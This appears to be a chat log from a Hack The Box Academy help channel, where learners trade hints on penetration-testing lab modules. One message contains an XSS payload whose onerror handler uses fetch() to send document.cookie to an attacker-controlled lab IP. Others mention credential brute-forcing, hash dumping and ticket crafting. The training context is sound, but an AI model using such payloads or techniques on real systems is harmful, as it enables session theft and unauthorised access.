need help for this: https://academy.hackthebox.com/module/143/section/1279 Question: 8 Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

I have the Admin of SQL01, and a password of mssql, dumped all the hashes, tried to use the password of mssql but no luck

Why is nxc so slow on ftp? I ran it in password mutations section and it sends 1 request every 5 seconds

While hydra has normal speed so it is not about vpn/internet speed

Module: Introduction to Windows Evasion Techniques
Section: Skills Assessment I

Can I DM somebody about this? kinda stuck and need some help

hey guys whats up... iam stucked in password attacks / Network Services is it normal that he dont react to this. Yesterday i had the issue that he had a timeout in checking the password with the user names and now he show me this. ┌──(kali㉿kali)-[~/files]
└─$ ping 10.129.146.130
PING 10.129.146.130 (10.129.146.130) 56(84) bytes of data.
64 bytes from 10.129.146.130: icmp_seq=2 ttl=127 time=67.0 ms
64 bytes from 10.129.146.130: icmp_seq=3 ttl=127 time=61.7 ms
^C
--- 10.129.146.130 ping statistics ---
3 packets transmitted, 2 received, 33.3333% packet loss, time 2021ms
rtt min/avg/max/mdev = 61.652/64.328/67.005/2.676 ms

┌──(kali㉿kali)-[~/files]
└─$ crackmapexec winrm 10.129.42.197 -u username.list -p password.list

he show me nothing backs and thats it

when i run evil-winrm shows me also an error evil-winrm -i 10.129.42.197 -u john
Enter Password:

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type Errno::EHOSTUNREACH happened, message is No route to host - No route to host - connect(2) for "10.129.42.197" port 5985 (10.129.42.197:5985)

Error: Exiting with code 1

yeah, figured I'd help out with some typos while I was reading through it lol

Guy's I'm looking for a remote cybersecurity internship , can anyone help with that

@versed eagle please don't post solutions for module questions

Ok sorry, thought having it in a spoiler was ok. Where can I ask my question then? Because it's related to what's stated in the solution

?

you may ask someone to DM you

Aight, can anyone DM me related to the TE.CL lab in the HTTP Attacks module? I solved it, but I don't really understand the way it's described in the solution

Yeah you can DM.

Hi everyone,
I'm working on Exploiting XSS via WebSockets section. I know that ||InnerHTML is used||. Hence, I'm using the following payload:
||<img src='x' onerror='fetch("http://10.10.14.190:8001/exfil?data=" + encodeURIComponent(document.cookie))'||

However, I can't obtain the admin's cookie. If someone could provide a hint, I would appreciate it as I didn't get the hint on the section.
Link: https://academy.hackthebox.com/module/231/section/2487

can someone help me with Intro to C2 Operations with Sliver -> Skills Assessment-> Q3 Escalate your privileges and submit the contents of the flag.txt file on the Administrator's desktop on the domain controller I can't find the way to DC. Found a user on the machine but I don't know how to use it

Iirc you have rc as service user on the dc no?

Can I dm you? Don't want to spoil er anything

Sure

Hello i am facing an issue with that:
https://academy.hackthebox.com/module/295/section/3371

When i am trying to give the answer it say is not correct, but there is also writed inside the module i think anyway the answer i am giving is correct could i talk with somebody?

yo,
in the common protocol section in Networking Fundamentals module
why is DNS mentioned under both TCP as well as UDP ?
as far as i recall from a networking course it was mentioned that DNS uses UDP as there will be a lot of overhead which is not necessary for mere domain name resolving

Good Afternoon guys someone do you know how can i run this command here?

Why i can't send a pic here

Only verified users can post pictures Read and follow #welcome

Cool got it

PowerShell does not know cURL.
You can use Invoke-WebRequest instead

https://www.educative.io/answers/curl-in-powershell

mmm

Why I'm getting this error ? This is a unconstrained delegation users- section in kerebros attack. the tool is krbrelayx

If it's not getting the ticket, you have to specify the target with --target

& TFTP is also repeated.., as well as NTP, there's a lot of overlapping between the two categories..

in aworld filled with violence, every from of what?

@rough violet

I can't write #general

@astral vault

sry for ping

Hello,

I hope you’re doing well. I’m currently working on the Academy track for brute-forcing a web service.

I successfully brute-forced the SSH user, no issues there.
I’ve scanned all the ports on the machine, but I don’t see any FTP service.
Just in case, I’m wondering if a banner might be returning the wrong fingerprint. I created a script to brute-force each open port using Medusa.

I just wanted to ask for a hint:
I’ve found several authentication portals on the machine, and I’m wondering if I should focus on crafting FORM requests with Medusa instead to complete the exercise?

Thank you in advance!

Hmm

and ?

Wrong path?

I think

Why are the web server's ssh ports open...

Ok. I continu to search.
Thx

good evening

I want to ask about the Network Enumeration with Nmap module

is this host discovery and host port scanning part really an error? because in the host discovery module there is no IP given to find what OS is being used and in the port scanning the IP is active but the available TCP IP cannot be searched

Can anyone help me ?

Host discovery is often used to detect which IP addresses are active on the network

After I detect an active network, the result is still an error

After this process, you need to use one of the active IP addresses for port scanning, for example:
"nmap -p 1-25565 1.1.1.1"

But I think you are getting an error here

You don't need IP just check the previous nmap result which is given. Tip:- Focus on the TTL value.

someone can help me with this please?

abuse

what?

what

?

@spiral sinew @rustic sage thankyou

I dont think you are supposed to execute these commands from windows, but from linux instead

but

this is impossible run in velociraptor

with these exercirse

I think if the module tells you to use cURL, then you can use the PwnBox

but i still can't find the answer

I'm with the vpn

You can run in your own terminal

but i still can't find the answer

If anyone is available and did that module just to see if i am sending the uncorrect answer or is just the platform with uncorrect question?

hello I am doing the medium lab of the password attacks section and I would like to know I must obtain root

I obtain a private ssh key in the user folder "dennis"

why does this key allow me to connect as root root@ip -i id_rsa when it is the key found in the personal directory of dennis which does not have elevated privileges

HI

Im stuck on a question in Introduction to penetration testing

The question is what is the first ethical principle

I put in Do No Harm but its saying that its incorrect

are you coping/pasting the command shown in the section? If yes, that doesn't work. Check the IP address and port when spawning the target and adjust the command to your needs.

yow

The command looks fine the gobuster one, however as I already said you need to use the port specified next to the target IP. Is the target port 81?

Hello

Can u give me blooket hacks for all tokens

For a video

U know

/rank

👋🏾

hi, is it possible to restart a modules of the beggining and "erase" progress ?

Erasing progress - no, there was a browser plugin created by one of the people in the community that hides the submitted answers

oh ok can you tell me the plugin name pls ?

I don't recall, but if you verify your account in the server you might find it in some of the channels

ok thanks sir

it was posted here: #resources-tools message

thanks ❤️

guys someone completed intro to academy's purple modules?

Any hint for my question just before. Stuck.
Medusa for brute force ftpuser but in the opening port, nothing in ftp.

Did you check the right one?

..

i would love to help you but i'm a newbie 😦

I checked all open ports.

That machine is laggy

It required multiple restarts for me

Ok thanks. 👊

Hi, I have been trying the wordpress hacking module. But I am stuck at the beginning of it. Can someone help me out.

hi, is something wrong with download links on this page https://help.hackthebox.com/en/articles/6369713-installing-parrot-security-on-a-vm#h_2057391f2a

anyone could give me a hint for fourth question on Sliver's skill assessment?

There is a PS script somewhere

I am already on dc with that user

Ohh. My bad... Noted the wrong order of flags

Did you dump DC02?

Yes, I run lsadump

Then the jump is easy.... Simple ticket crafting if you know what I mean

Might be a double hop problem if your strictly using Sliver

Can I dm you?

Sure

Hello 👋🏾 everyone

I'm new here

It's very exciting to be here with you guys

I'm hoping to learn a lot from everyone

please help me on this

Cross-Site Scripting (XSS) / Phishing

getting error: Issue in sending URL!

Despite several restarts, the issue remains the same. I’ll move on from this exercise for now, but I’ll come back to it later. Thank you anyway!

Don't spoil skill assessments

Bro

I need hacking lessons

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

hello.

https://nohello.net

I am doing the getting started Module and on the public exploits section

Am I getting distracted with the server being apache and trying to find an exploit for it?

Did you visit the web page?

It's generally unlikely the underlying service is vulnerable, typically what's vulnerable is something like the CMS and plugins

You want to target the underlying service as a last resort

Hence why the hint says search for plugin exploit

Bingo

And hence my tip: did you visit the webpage?

:)

It'll be hard to miss

Yes and that was my problem. I got so distracted with the the apache running on an odd port that I didn't do the basic thing and that is visiting the webpage

It'll hit you like a ton of bricks iirc it's literally in big bold letters as soon as you go on it

I need to not get tunnel vision

It happens

one more thing. When I set the LHOST can I set it to tun0 like it has in the examples?

Yes

set lhost tun0

But that's if the exploit even uses the lhost variable

If it doesn't use/require it, no need to set it

Also the example isn't gonna be 1::1 of what you're gonna do for the practical

The example is there to show you a line of thought process

Linux Fundamentals, Filter Contents, Q3: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

Should I be able to get to the webpage on Safari from inside the instance? I'm just learning curl and I've tried several commands I found from searching Google, but even when I do just curl https://www.inlanefreight.com, I get curl: (28) Failed to connect to www.inlanefreight.com port 443 after 133234 ms: Couldn't connect to server. Is this a user error situation, or is my spawned instance not connecting to the URL like it's supposed to?

Could be a pwnbox restriction being dumb

You can use your own vm to do this exercise

Either way it's a pita

pita?

Pain in the ass

As it requires some web knowledge, and regex

ah, haha got it

To copy/paste from the forum https://forum.hackthebox.com/t/linux-fundamentals-filter-content-filter-all-unique-paths-of-domain/270162
||I completed this exercise with the following command :

curl -s https://www.inlanefreight.com | tr -d \'\" | grep -o -E "(href|url|src)=[^ >]+" | cut -d '=' -f 2 | grep -vE ".*(defer|\.org|google|themeansar).*" | cut -d "?" -f 1 | sort | uniq | tee /dev/stderr | wc -l

Let me explain each step :

curl -s https://www.inlanefreight.com
This get the URL content but without metrics output automatically added by curl when it outputs the result. These metrics will get insert before and in the middle of fetched data if not ignored.

tr -d \'\"
URL and other HTML elements parameter’s values can be encapsulated between either quote or double quotes or not encapsultated at all. So, to making parsing easier, I prefer removing them.

grep -o -E "(href|url|src)=[^ >]+"
In HTML, URL are given in href, url or src elements. So I use a grep to retrieve the attribute and its URL value ONLY thanks the regex stopping at first space or > met.

cut -d '=' -f 2
Now, I am left with attributes having the following structure : (href|url|src)=url
So, I split each entry using the = delimiter and keeping only the url.

grep -vE ".*(defer|\.org|google|themeansar).*"
Now, I have all available URLs but not all are part of the target domain. So I use the -v grep option to keep only strings not matching the given regex where I specified specific words found in url I wanted to ignore.

cut -d "?" -f 1
URL may have query strings. A url points to a resource but this resource may be a script taking parameters to give us the right result. As the exercise asks us to count unique url in the domain, we have to ignore query strings / parameters. So I split urls using the ? delimiter as this is the character used to indicate start of the query string and I keep only the first part.

sort | uniq | tee /dev/stderr | wc -l
Finally, I just need to sort found urls with the sort command, remove duplicates with the uniq command and count lines with wc command to get the result.||

I cheated when I went through it and looked up a forum answer because it was just straight annoying (and trying to get chatGPT to do it is like pulling teeth)

By far one of the more out of place sections in an intro module

I found that one too, it gives me an answer of 0. That's why I was thinking it's a connection issue with the instance

thanks anyway

Connection issues for sure if curl isn't connecting

I suggest just setting up your own vm, it'll be better in the long run

When I run the exploit, am I supposed to be given a terminal, does it supposed to download a file?

that depends on the exploit

the exploit for the wordpress simple backup plugin

if it's on nibbles i don't think so but i can't remember tbh. a lot of times the exploit will have some comments or a github page describing what it does.

I am reading about the exploit on rapid7

it seems all I do is set the RHOSTS and run the exploit